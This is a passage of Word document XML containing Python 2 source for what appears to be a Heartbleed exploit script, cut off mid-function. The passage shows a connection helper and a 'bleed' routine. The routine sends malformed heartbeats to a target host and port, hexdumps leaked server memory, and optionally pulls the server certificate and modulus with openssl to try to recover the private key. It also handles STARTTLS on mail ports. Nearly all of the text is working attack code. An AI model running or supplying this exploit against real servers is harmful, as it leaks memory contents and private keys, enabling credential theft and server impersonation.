    <w:p w14:paraId="1661C3EC" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">            else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FA60249" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="5EB28448" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">                print 'Server processed malformed heartbeat, but did not return any extra data.'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0189AF3A" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="1A13FB38" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="0B996133" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="163295F1" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">        if </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>typ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> == 21:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DAF076C" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="2EBC734B" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">            print 'Received alert:'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E9FD728" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="250DDFA1" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">            return </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hexdump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(pay)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2048E743" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="27DCC747" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">            print 'Server returned error, likely not vulnerable'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BD5A706" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="2E758A87" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">            return ''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E502A11" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="146AC3E4" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="5EE9C317" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="48EE2B36" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="73FC98FF" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="3C865B6F" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t>def conn(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>targ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, port):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="096E8147" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="6F622D00" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">    try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24653949" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="5A5368BB" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        s = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>socket.socket</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>socket.AF_INET</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>socket.SOCK_STREAM</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CE5A526" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="20FD8D21" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sys.stdout.flush</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A1BFB2A" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="5E7F3B5E" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>s.settimeout</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(10)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52157F6E" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="1DC68996" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">        #time.sleep(0.2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6499052C" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="5D686657" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>s.connect</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>((</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>targ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, port))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="092AED07" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="4ED3DBB7" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">        return s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30A0E1D5" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="270486DE" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="73B6A7FF" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="4157C810" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">    except Exception as e:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FA2F357" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="095E2F2B" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">       print "Connection Error! " + str(e)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D4440EF" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="3E7C197E" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">       return None</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39EADC9A" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="021DD405" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">       </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D5B6FA6" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="47D7171D" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t>def bleed(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>targ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, port):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="219E7BEB" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="5804ABAE" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">    try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="463B0CB9" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="6263FF3B" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">        res = ''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31435519" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="7F2471AD" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>firstrun</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = True</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3429F2A2" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="484E0333" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">        print '\n##################################################################'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73DD86E7" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="148D41C8" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">        print 'Connecting to: ' + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>targ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> + ':' + str(port) + ', ' + str(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>opts.num</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>) + ' times'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A2164DC" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="3E26FF2C" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">        for x in range(0, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>opts.num</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79181E1D" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="2D48244A" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">            if x &gt; 0:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43A4F822" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="2AD0149B" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">                </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>firstrun</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = False</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BB35980" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="7A7D3925" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="310642BE" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="583B4811" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">            if x == 0 and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>opts.extractkey</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7548943B" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="7C6B9663" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">                print "Attempting to extract private key from returned data..."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46755704" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="1E980275" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">                if not </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>os.path.exists</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>('./</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-certs'):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48A2F95A" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="2F44CA0A" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">                    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>os.makedirs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>('./</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-certs')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D079B06" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="27D33AA1" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">                print '\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nGrabbing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> public cert from: ' + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>targ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> + ':' + str(port) + '\n'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D7CF94B" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="6E74A509" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">                </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>os.system</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">('echo | 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s_client</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -connect ' + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>targ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> + ':' + str(port) + ' -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>showcerts</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> | </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>openssl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> x509 &gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-certs/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sslcert</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">_' + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>targ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> + '.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pem</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>')</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BEC2E9A" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="7EC485CF" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">                print '\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nExtracting</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> modulus from cert...\n'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="544E5B6C" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="5D161693" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">                </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>os.system</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>('</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>openssl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> x509 -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pubkey</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>noout</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-certs/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sslcert</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">_' + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>targ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> + '.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pem</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> &gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-certs/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sslcert</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">_' + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>targ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> + '_</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pubkey.pem</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="336CE529" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="73A034FA" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">                output = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>os.popen</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>('</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>openssl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> x509 -in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-certs/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sslcert</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">_' + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>targ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> + '.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pem</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -modulus -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>noout</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> | cut -d= -f2')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="641D47EA" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="525CC7D4" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">                modulus = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>output.read</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C6AF877" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="3ECACF03" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05748182" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="6198FC6A" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">            s = conn(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>targ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, port)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45186472" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="53D23F81" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">            if not s:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43DB2CC0" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="4A50A960" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">                continue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="137EA9BC" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="7D424D50" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="739CE2DB" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="64B7E1DE" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">            # send </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>starttls</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> command if specified as an option or if common smtp/pop3/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>imap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> ports are used</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D60FAA7" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="0C7CE649" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">            if (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>opts.starttls</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>) or (port in {25, 587, 110, 143, 21}):</w:t>
      </w:r>
    </w:p>
